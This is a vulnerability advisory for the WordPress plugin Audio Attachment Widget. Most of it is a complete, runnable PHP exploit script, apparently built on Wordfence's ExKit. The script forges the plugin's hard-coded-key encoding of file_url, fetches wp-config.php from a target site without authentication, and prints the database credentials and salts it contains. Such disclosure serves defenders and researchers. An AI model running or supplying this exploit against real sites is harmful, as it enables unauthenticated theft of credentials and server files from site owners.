Audio Attachment Widget [Unauthenticated Arbitrary File Download]

Description

The Audio Attachment Widget plugin ships a helper script that serves files to users as downloads. The script performs no authentication and does not validate the requested path, so an unauthenticated attacker can use it to read arbitrary files from the server (the PoC below retrieves wp-config.php). The only "protection" on the request parameter is a fixed-key byte-shift transform whose key is embedded in the plugin itself; since any client can reproduce it, it is an encoding, not an authorization control.

The vulnerable script is audio-attachment-widget/includes/download.php; the vulnerable parameter is $_REQUEST["file_url"], which PHP populates from GET, POST or cookie values alike.

PoC

#!/usr/bin/env php
<?php
/*******************************************************************************
 * Audio Attachment Widget - Unauthenticated Arbitrary File Download
 *
 * Author: Pan Vag <[email protected]>
 * To install deps run `composer install`
 ******************************************************************************/

require_once 'vendor/autoload.php';

use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;

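// Target site; Config::get() prompts for it when it was not supplied up front.
$url = Config::get( 'url.base', null, true, 'Enter the site URL' );

if ( ! $url ) {
    Cli::writeError( 'You must enter a valid URL' );
    exit( ExitCodes::EXIT_CODE_FAILED_PRECONDITION );
}

// download.php expects file_url wrapped in the plugin's own "encryption" (MyEncryption
// below). The key is hard-coded, so any client can produce an acceptable value — the
// wrapper is not an authorization check. wp-config.php is requested relative to the site
// root; installs that keep it one directory above the web root will not match this path.
$wpConfig = MyEncryption::enc_encrypt( Endpoint::baseURL() . '/wp-config.php' );
$url      = Endpoint::pluginsURL() . '/audio-attachment-widget/includes/download.php?file_url='
            . urlencode( $wpConfig );

// A transport failure (DNS, TLS, timeout) is raised as an exception rather than returned
// as a response; report it through the normal failure path instead of an uncaught trace.
try {
    $r = Requests::get( $url );
} catch ( \Exception $e ) {
    ExitCodes::exitWithFailed( 'Request failed: ' . $e->getMessage() );
}

// Success requires a 200 and a body that looks like wp-config.php (contains DB_NAME);
// anything else (error page, empty body, redirect to login) counts as failure.
if ( ! $r->success || $r->status_code != 200 || strpos( $r->body, 'DB_NAME' ) === false ) {
    ExitCodes::exitWithFailed( 'Failed to download file, response was: ' . $r->body );
}

// The body carries database credentials and salts — treat the console output as sensitive.
Cli::writeSuccess( 'Exploitation successful, follows wp-config.php file contents:' );
Cli::write( $r->body );
ExitCodes::exitWithSuccess();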

class MyEncryption {
    // Fixed key, presumably copied from the plugin's source so this PoC can produce values
    // download.php accepts. Because the key ships with the plugin and the transform below is
    // a plain per-byte additive shift, it provides no integrity or authorization guarantee:
    // anyone can forge a valid "encrypted" file_url.
    private static $key = 'MIGfMA 0GCSqGSIb3D QEBAQUAA4 GNADCBiQKBgQDJmhAL 93uF2NO0bIfW/U4PAS oPEe6gVOkwI23Vek1Vw81Q91Cte D5Bdh4nEPjYigEtqpVSTRDvRjseA4dnkpfVXv LhVXpsUG5Nc7lxSMhO7jj0uiOQMJHQNeP3GCuV3p6gqn3p5s0vsvW6b5vQy7Iuny +x0PfzIU74DnsB0sCQIDAQAB';

    /**
     * Reproduce the plugin-side "encryption" of a string.
     *
     * Each input byte is shifted by the ordinal of one key byte (chr() wraps at 256) and the
     * resulting byte string is base64-encoded. An empty input yields an empty string.
     *
     * @param string $string plaintext, e.g. the URL of the file to request
     * @return string base64 of the shifted bytes
     */
    public static function enc_encrypt( $string ) {
        $key     = self::$key;
        $keyLen  = strlen( $key );
        $len     = strlen( $string );
        $shifted = '';

        for ( $pos = 0; $pos < $len; $pos ++ ) {
            // The key index is deliberately off by one: input position 0 pairs with the LAST
            // key byte, then the key is consumed from its first byte. This presumably mirrors
            // the plugin's own implementation — "fixing" it would make the server decode a
            // different path.
            $keyIdx = ( $pos % $keyLen ) - 1;
            if ( $keyIdx < 0 ) {
                $keyIdx += $keyLen;
            }
            $shifted .= chr( ord( $string[ $pos ] ) + ord( $key[ $keyIdx ] ) );
        }

        return base64_encode( $shifted );
    }
}

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX